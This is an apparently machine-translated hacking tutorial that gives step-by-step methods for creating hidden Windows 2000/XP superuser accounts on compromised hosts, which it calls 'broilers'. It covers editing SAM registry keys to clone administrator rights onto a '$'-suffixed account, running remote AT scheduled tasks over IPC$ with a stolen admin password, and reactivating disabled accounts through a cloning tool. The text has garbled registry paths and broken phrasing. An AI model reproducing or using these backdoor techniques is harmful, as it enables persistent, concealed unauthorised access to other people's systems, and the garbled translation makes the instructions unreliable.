A variety of ways to hide superuser in a system

How to create a hidden super user in the graphical interface

The graphical interface is suitable for local or open 3389 Terminal Services on the broiler. The author I mentioned above said that the method is very good, but more complex, but also to use Psu.exe (let the program as the system user status of the program), if the words on the broiler to upload psu.exe. I said this method will not have to psu.exe this program. Because Windows2000 has two registry editors: Regedit.exe and Regedt32.exe. XP Regedit.exe and Regedt32.exe are actually a program that modifies the rights of key values by right-clicking "permissions" in the right key. I think everyone is familiar with the Regedit.exe, but you can't set permissions on the key keys to the registry, and Regedt32.exe the biggest advantage is the ability to set permissions on key keys in the registry. NT/2000/XP's account information is under the Registry's Hkey_local_machinesamsam key, but other users are not authorized to see the information except system users, so I first set the SAM key to "Regedt32.exe" for me. Full Control "permission. This allows you to read and write the information in the SAM key. The concrete steps are as follows:

1. Assuming that we are logged on to a broiler with Terminal Services as Superuser Administrator, first set up an account at the command line or in the Account Manager: hacker$, here I set up this account at the command line.

NET user hacker$ 1234/add

2, in the start/Run input: Regedt32.exe and enter to run Regedt32.exe.

3, the point "permission" will pop up the window

Click Add to add the account I logged in to the security bar, where I logged in as Administrator, so I joined the administrator and set the permissions to Full control. Here is a note: It is better to add the account or account you are logged in to the group, do not modify the original account or group, otherwise it will bring a series of unnecessary problems. And so the hidden super user is built, and then come here to delete the account you added.

4, then click "Start" → "Run" and enter "Regedit.exe" return, start Registry Editor Regedit.exe. Open key:

hkey_local_maichinesamsamdomainsaccountusernameshacker$ "

5, the item hacker$, 00000409, 000001F4 Export as Hacker.reg, 409.reg, 1f4.reg, with Notepad dozen these exported files for editing, the super user corresponding to the key 000001f4 under the value of "F" copy, and overwrite the value of the key "F" in the corresponding item 00000409 of hacker$, then merge 00000409.reg with Hacker.reg.

6. Execute NET user hacker$/del at the command line to delete users hacker$:

NET user hacker$/del

7, in Regedit.exe window press F5 Refresh, and then file-Import registry files will be modified Hacker.reg import registry can

8, to this, the hidden super user hacker$ has been built, and then shut down the Regedit.exe. In the Regedt32.exe window, change the Hkey_local_machinesamsam key permissions back to the original (as long as you delete the added account administrator).

9. Note: Hidden super user built, in the account manager can not see hacker$ this user, in the command line with the "NET User" command can not see, but after the establishment of superuser, you can no longer change the password, if the net user command to change the hacker$ password, The hidden Superuser will be seen again in the account manager and cannot be deleted.

How to create a hidden superuser remotely under the command line

The AT command is used here, because the scheduled task produced with at is run as a system, so the Psu.exe program is not used. In order to be able to use the AT command, the broiler must have a schedule service, if not open, can be used in Streamer tools Netsvc.exe or Sc.exe to remotely start, of course, its method can also, as long as can start schedule service on the line.

For command-line methods, you can use a variety of connection methods, such as using SqlExec to connect MSSQL 1433 ports, or Telnet service, as long as you can get a cmdshell and have permission to run at command.

1, first to find a chicken, as to how to find that is not what I am talking about the topic. Let's assume that we've found a super User administrator with a password of 12345678, and now we're starting to remotely create a hidden superuser for it at the command line. (in the example of the host is a host in my local area network, I will change its IP address to 13.50.97.238, please do not on the Internet, so as to avoid harassment of normal IP address.) )

2, first to establish a connection with the broiler, the command is: net use 13.50.97.238ipc$ "12345678"/user: "Administrator

3. Use at command to establish a user on the broiler (if the at service is not started, use the Netsvc.exe or sc.exe of the Banyan tree to start remotely):

At 13.50.97.238 12:51 c:winntsystem32net.exe user hacker$ 1234/add

Create the user name with the $ character, because after the $ character is added, the user will not be displayed in the command line with net user, but the user can be seen in the account manager.

4. Also use the AT command to export hkey_local_machinesamsamdomainsaccountusers key values:

At 13.50.97.238 12:55 c:winntregedit.exe/e Hacker.reg

Hkey_local_machinesamsamdomainsaccountusers

/e is the regedit.exe parameter, in _local_machinesamsamdomainsaccountusers this key must end. If necessary, you can enclose the c:winntregedit.exe/e hacker.reg hkey_local_machinesamsamdomainsaccountusers in quotation marks.

5, the chicken on the Hacker.reg download to the computer with Notepad open for editing commands are:

Copy 13.50.97.238admin$system32hacker.reg C:hacker.reg

The modified method has been introduced in the graphic world and is not introduced here.

6. Hacker.reg the edited copy back to the broiler

Copy C:hacker.reg 13.50.97.238admin$system32hacker1.reg

7, view broiler time: NET times 13.50.97.238 then use the AT command to remove the user hacker$:

At 13.50.97.238 13:40 NET user hacker$/del

8, verify hacker$ is deleted: With

NET use 13.50.97.238/del disconnect from the broiler.

NET use 13.50.97.238ipc$ "1234"/user: "hacker$" with the account hacker$ connection with the broiler, cannot connect the description has been deleted.

9, then with the broiler set up a connection: net use 13.50.97.238ipc$ "12345678"/user: "Administrator"

To get the chicken time, use at command to hacker1.reg the chicken into the broiler registry:

At 13.50.97.238 13:41 c:winntregedit.exe/s Hacker1.reg

The regedit.exe parameter/s refers to quiet mode.

10, and then verify that hacker$ has been established, the same method as above to verify that hacker$ is deleted.

11, and then verify the user hacker$ whether read, write, delete the permissions, if not trust, you can also verify that you can establish other accounts.

12, through 11 can be concluded that the user hacker$ has Superuser rights, because initially I used at the command to establish it is an ordinary user, but now has remote read, write, delete permissions.

Third, if the broiler does not open 3389 Terminal Services, and I do not want to use the command line, how to do?

In this case, you can also use the interface to remotely create a hidden superuser for the broiler. Because Regedit.exe, Regedt32.exe have the ability to connect to the network registry, you can use Regedt32.exe to set permissions for the registry keys for remote hosts, and to edit the remote registry with Regedit.exe. The account Manager also has a function that connects another computer, and you can use the Account Manager to create and delete accounts for remote hosts. The concrete step is similar with the above introduction, I do not say much, only its speed is really unbearable.

There are two prerequisites: 1. NET use chicken ipipc$ "password"/user: "Super username" to establish a connection with the remote host, you can use Regedit.exe Regedt32.exe and account manager to connect with the remote host.

2, the remote host must open the Remote Registry service (not open, you can also remotely open, because you have the password of the super user).

Use a disabled account to create a hidden superuser

1, want to do to see which users are carefully administrators prohibit, in general, some administrators for security reasons, usually will be disabled guest, of course, will disable other users. Under the graphical interface, it's very easy to see a red fork on a disabled account in the Account manager, and at the command line, I haven't figured out a good way to see if a user is disabled by using a command at the command line: "NET user username."

2. Here, we assume that the user hacker is disabled by the administrator. First of all, I first use the super group of Banyan user cloning program CA.exe, will be disabled user hacker clone to Superuser (after cloning, the disabled user hacker will automatically be activated): CA. EXE Broiler IP Administrator Super User password Hacher hacher password.